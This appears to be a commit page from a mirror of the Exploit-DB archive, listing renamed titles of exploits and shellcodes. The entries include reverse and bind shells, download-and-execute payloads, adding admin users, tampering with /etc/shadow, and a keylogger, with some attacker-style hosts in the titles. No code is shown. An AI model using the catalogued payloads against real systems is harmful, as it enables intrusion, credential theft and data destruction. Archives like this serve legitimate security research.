bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-19

Browse source 
58 changes to exploits/shellcodes

Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (1)

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (2)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)

Rosoft Media Player 4.2.1 - Local Buffer Overflow
Rosoft Media Player 4.2.1 (Windows XP SP2/3 French) - Local Buffer Overflow

GNU Screen 4.5.0 - Local Privilege Escalation
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)

glibc - 'getcwd()' Local Privilege Escalation

JAD java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow

JAD Java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)

Ability Server 2.34 - Remote APPE Buffer Overflow
Ability Server 2.34 - 'APPE' Remote Buffer Overflow

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)

Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)

Invision Power Board 2.0.3 - 'login.php' SQL Injection
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)

FOSS Gallery Public 1.0 - Arbitrary File Upload
FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'view_listing.php' SQL Injection

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via Disabling of IP Quarantine)

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via New Profile Creation)

Primefaces 5.x - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'searchCommercial.php' / 'searchResidential.php' SQL Injection

BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)
BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)

FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)
FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)

Linux/x86 - execve() Null-Free Shellcode (Generator)
Linux/x86 - execve() + Null-Free Shellcode (Generator)

Windows XP SP1 - Bind TCP Shell Shellcode (Generator)
Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)

Linux/x86 - Command Generator Null-Free Shellcode (Generator)
Linux/x86 - Command Generator + Null-Free Shellcode (Generator)
(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)
Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)
Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - PUSH reboot() Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator Null-Free (Generator)
Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)
Linux/x86 - reboot() + PUSH Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)
Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)

Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)

Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)

Linux/x86 - execve() Read Shellcode (92 bytes)
Linux/x86 - execve() + Read Shellcode (92 bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)

Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - execve(/bin/sh)  + Re-Use Of Strings In .rodata Shellcode (16 bytes)

Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)
Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)

Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)
Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)

Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)
Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)

Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)

Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)
Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)

Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)

Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)

Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)
Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)

Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)
Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)
Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)

Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)

OSX/PPC - Reboot Shellcode (28 bytes)
OSX/PPC - Reboot() Shellcode (28 bytes)
Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)
Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)

Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)
Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)

Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)
Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)
Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - Egg Omelet SEH Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)
Windows x86 - Command WinExec() Shellcode (104+ bytes)
Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)
Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode
Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)
Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)
Windows/x86 - Egg Omelet SEH Shellcode
Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows/x86 (XP SP2)  (French) - cmd.exe Shellcode (32 bytes)
Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)
Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows/x86 - Download File + Execute Shellcode (192 bytes)
Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes)
Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes)
Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes)
Windows/x86 - Command WinExec() Shellcode (104+ bytes)
Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows  (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)
Windows  (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)
Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)
Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode
Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)

Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)

Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)
Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)

Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode
Windows/x86 (XP SP3) - ShellExecuteA Shellcode
Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode

Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)
Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)

Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows/x86 (XP SP2)  (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)
Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)
Windows  (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)
Windows  (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)

Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Windows/x86 (XP SP2)  (French) - calc Shellcode (19 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP3)  (English) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)
Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)
Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter JITed Stage-0 Shellcode
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode
Windows/x86 - JITed Stage-0 Shellcode
Windows/x86 - JITed exec notepad Shellcode
Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)
Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode
Windows/x86 (XP SP3)  (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows/x86 - MessageBox Shellcode (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode

Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)
Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)

Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)
Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes)

Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)
Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)

Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode
Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode

Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)

Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)
Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)

Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/shadow +  sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)
Windows 7 x64 - cmd Shellcode (61 bytes)
Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)
Windows/x86-64 (7) - cmd Shellcode (61 bytes)
Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode

Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)
Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)
Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)

Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode
Windows Mobile 6.5 TR - Phone Call Shellcode
Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows/ARM  (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode
Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode
Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)

Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode
Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode

Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode
Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode

Windows x86 - Eggsearch Shellcode (33 bytes)
Windows/x86 - Eggsearch Shellcode (33 bytes)

Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)
Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode
Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)
Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode
Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode

Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)
Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)
Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter Shellcode (31 bytes)
Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)
Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox Null-Free Shellcode (113 bytes)
Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox + Null-Free Shellcode (113 bytes)
Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)
Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)

Linux/x86 - rmdir Shellcode (37 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)

Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)

Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)

Linux/x86 - Egghunter Shellcode (20 bytes)
Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)
Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Shellcode (57 bytes)
Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)
Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)

Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)

Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)

Linux/x86 - Reboot Shellcode (28 bytes)
Linux/x86 - Reboot() Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter Shellcode (19 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode
Windows 2003 x64 - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode
Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)
Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode
Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)

Linux/x86-64 - Egghunter Shellcode (24 bytes)
Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)

Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)
Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)
Linux/x86-64 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter Shellcode (13 bytes)
Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)
Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)

Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)

Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)
Windows/x86 (.Net Framework) - Execute Native x86 Shellcode

